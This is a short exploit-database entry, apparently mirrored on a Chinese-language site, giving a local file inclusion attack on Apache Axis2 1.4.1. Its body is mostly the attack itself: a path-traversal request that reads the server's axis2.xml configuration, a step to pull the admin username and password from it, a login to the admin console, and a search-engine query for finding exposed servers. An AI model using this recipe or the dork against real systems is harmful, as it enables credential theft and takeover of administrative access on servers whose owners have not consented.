Apache Axis2 1.4.1 – Local File Inclusion

• Exploit Database
• 39 阅读

• 作者： HC
  日期： 2010-05-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12721/

• # Exploit Title: Apache Axis2(1.4.1) Local File Inclusion Vulnerability
  # Date: 2010/5/24
  # Author: HC
  # Software Link: http://ws.apache.org/axis2/download/1_4_1/download.cgi
  # Version: Axis2 1.4.1
  # Tested on: Linux
  # category: Webapps
  # Code :
  
  1.http://Domain Name/axis2/services/xxxxxxx?xsd=../conf/axis2.xml
  (ex: http://Domain Name/axis2/services/Version?xsd=../conf/axis2.xml)
  
  2. search keyword "password". （Get username and password）
  
  
  3. Login http://Domain Name/axis2/axis2-admin/
  
  
  google: inurl:"axis2/services" "list Services"